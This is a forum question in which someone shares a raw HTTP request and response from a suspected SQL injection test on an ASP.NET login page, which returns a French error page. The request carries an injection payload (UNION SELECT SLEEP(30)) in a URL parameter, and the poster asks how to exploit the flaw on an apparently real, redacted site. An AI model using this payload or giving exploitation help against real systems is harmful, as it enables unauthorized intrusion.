I think I found an SQL vulnerability; the request and response can be found below. I'm not sure because it is showing a normal error (it's in French) instead of showing an SQL error.
I also tried to SQL inject the user page (after I logged in normally to the site) by adding a quote (') to a parameter, but I got the same normal error instead of the SQL one.
Could someone experienced tell me if this is an SQL error message and if an exploit is possible? If yes, how can someone exploit this?
GET /Anonym/Login.aspx?lnrid=636705509463187707" UNION SELECT SLEEP(30) -- &_lnPageGuid=0709206f-a5aa-40cf-bad7-78fb5452f5df&__EGClientState=NY&__VIEWSTATE=NY&__EVENTVALIDATION=%2FwEdAAivVXD1oYELeveMr0vHCmYPbKvSQfBZG4FRSb%2F8I7pm6gbzWSkUOVnL89VotOv3iwS9OtS9D9WQklHFFt9eID42Uj1o80q1QHHhR9Njbuhhm5HMJLG0qgnnIQHDWK64dEQaUDEQ2ba3nFNQp5gIEycdbMy1%2F4YQMXKqdpE3Qw%2F6%2Fw%3D%3D&egWindowManager%24clientWindow%24Oui=Oui&egWindowManager%24clientWindow%24Non=Non&egWindowManager%24clientWindow%24Ok=Ok&ctlUserCode=vega&ctlUserPassword=vega&ctlLogon=Connexion
Host: redacted
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-UA-Compatible: IE=edge
Date: Fri, 24 Aug 2018 07:37:32 GMT
Content-Length: 2082

[error page; only relevant parts:]
<body>
<form name="FrmErr" method="post" action="../PageErreur.aspx?lnrid=636705509463187707%22+UNION+SELECT+SLEEP(30)+--+&_lnPageGuid=0709206f-a5aa-40cf-bad7-78fb5452f5df&__EGClientState=NY&egWindowManager%24clientWindow%24Oui=Oui&egWindowManager%24clientWindow%24Non=Non&egWindowManager%24clientWindow%24Ok=Ok&ctlUserCode=vega&ctlUserPassword=vega&ctlLogon=Connexion" id="FrmErr">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTk3MzY5NzU2NmRk" />
</div>
<div class="Outer">
<div class="Middle">
<div class="Inner">
<div class="ErrMsg">
<table style="margin: auto;">
<tr>
<td><img id="ImgLogo" src="../Logo.gif" style="border-width:0px;" /></td>
<td> </td>
<td><br />Le site éprouve présentement des difficultés, nous sommes désolés du contretemps.</td>
</tr>
</table>
<hr width="60%" noShade="noShade" SIZE="0" />
</div>
</div>
</div>
</div>
</form>